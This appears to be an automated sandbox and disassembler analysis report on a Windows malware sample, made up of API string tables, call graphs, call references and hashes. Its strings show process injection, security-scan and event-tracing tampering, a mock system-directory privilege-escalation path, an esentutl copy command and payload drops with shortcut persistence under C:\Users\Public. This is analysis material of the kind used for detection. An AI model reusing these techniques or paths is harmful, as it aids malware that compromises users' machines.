$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                • API String ID: 297057983-2644593349
                                                                                                                                • Opcode ID: a17eed07ffbcc5f27070012b1c678ae930f3691f0b74f4ef17f4a13818689182
                                                                                                                                • Instruction ID: b55d02beae2f92b8f966ebe61073465c5925099330f520550f308a12bacbcafb
                                                                                                                                • Opcode Fuzzy Hash: a17eed07ffbcc5f27070012b1c678ae930f3691f0b74f4ef17f4a13818689182
                                                                                                                                • Instruction Fuzzy Hash: 2714E875A0012C9FDB11EB64DD80ACE73BAFF85304FA041E6E549EB218DA30AE95DF51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 4574 2b38128-2b38517 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b148ec 4689 2b393a1-2b39524 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b148ec 4574->4689 4690 2b3851d-2b386f0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b147ec call 2b149a0 call 2b14d74 call 2b14df0 CreateProcessAsUserW 4574->4690 4780 2b39cf5-2b3b2fa call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 * 16 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b27c10 call 2b28338 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 ExitProcess 4689->4780 4781 2b3952a-2b39539 call 2b148ec 4689->4781 4799 2b386f2-2b38769 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4690->4799 4800 2b3876e-2b38879 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4690->4800 4781->4780 4788 2b3953f-2b39812 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2f094 call 2b14860 call 2b149a0 call 2b146d4 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b17e5c 4781->4788 5046 2b39818-2b39aea call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2e358 call 2b14530 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 * 2 call 2b14764 call 2b2dc8c 4788->5046 5047 2b39aef-2b39cf0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b149f8 call 2b28d70 4788->5047 4799->4800 4900 2b38880-2b38ba0 call 2b149f8 call 2b2de50 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2d164 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4800->4900 4901 2b3887b-2b3887e 4800->4901 5217 2b38ba2-2b38bb4 call 2b28730 4900->5217 5218 2b38bb9-2b3939c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 ResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 CloseHandle call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28080 call 2b2894c * 6 CloseHandle call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4900->5218 4901->4900 5046->5047 5047->4780 5217->5218 5218->4689
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C8B7E0,02C8B824,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B386E9
                                                                                                                                • ResumeThread.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8), ref: 02B38D33
                                                                                                                                • CloseHandle.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380), ref: 02B38EB2
                                                                                                                                  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                  • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B392A4
                                                                                                                                  • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                  • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                                  • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                                  • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                                  • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                                  • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                                • ExitProcess.KERNEL32(00000000,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,00000000,00000000,00000000,ScanString,02B97380,02B3B7B8), ref: 02B3B2FA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                • API String ID: 2769005614-3738268246
                                                                                                                                • Opcode ID: 04328828d6d82fd6c1147251dd6a065ad74ed4474d361b36479348b3b70a6c25
                                                                                                                                • Instruction ID: 3b474daacc5860f6207b0732d1cef65210261a39ded1c710ba4e0d4c46b18a38
                                                                                                                                • Opcode Fuzzy Hash: 04328828d6d82fd6c1147251dd6a065ad74ed4474d361b36479348b3b70a6c25
                                                                                                                                • Instruction Fuzzy Hash: 8C43FA79A0422CDFDB11EB64DD809CE73BAFF85344FA041E5E109EB218DA30AE959F51
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                  • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                                  • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                                  • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                                  • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,02B3BB30,00000000,00000000,02B3BB24,00000000,00000000), ref: 02B340CB
                                                                                                                                  • Part of subcall function 02B288B8: LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
                                                                                                                                  • Part of subcall function 02B288B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
                                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B34277
                                                                                                                                  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                  • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                • Sleep.KERNEL32(00004E20,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8), ref: 02B350EE
                                                                                                                                  • Part of subcall function 02B2DC04: RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                                  • Part of subcall function 02B2DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                                  • Part of subcall function 02B2DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                                  • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                  • Part of subcall function 02B285BC: WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                • API String ID: 2171786310-3926298568
                                                                                                                                • Opcode ID: a5b7a353f178f0ba000926f55702d93c9aa022628ed425f8b21b61047277497a
                                                                                                                                • Instruction ID: 62078ccba6966533380f2eae02c982846eff6cc491d1a7ac3b9f7e4da3072893
                                                                                                                                • Opcode Fuzzy Hash: a5b7a353f178f0ba000926f55702d93c9aa022628ed425f8b21b61047277497a
                                                                                                                                • Instruction Fuzzy Hash: 6143F475A0016D9FDB21EB64DD80BDE73B6FF85304FA040E6A409AB618DF30AE859F51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 10970 2b2e678-2b2e67c 10971 2b2e681-2b2e686 10970->10971 10971->10971 10972 2b2e688-2b2ec81 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14740 * 2 call 2b14860 call 2b14778 call 2b130d4 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14740 call 2b17f2c call 2b149a0 call 2b14d74 call 2b14df0 call 2b14740 call 2b149a0 call 2b14d74 call 2b14df0 call 2b28788 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c 10971->10972 11175 2b2eee2-2b2ef2f call 2b14500 call 2b14c60 call 2b14500 call 2b14c60 call 2b14500 10972->11175 11176 2b2ec87-2b2eedd call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 WaitForSingleObject CloseHandle * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 3 10972->11176 11176->11175
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                  • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
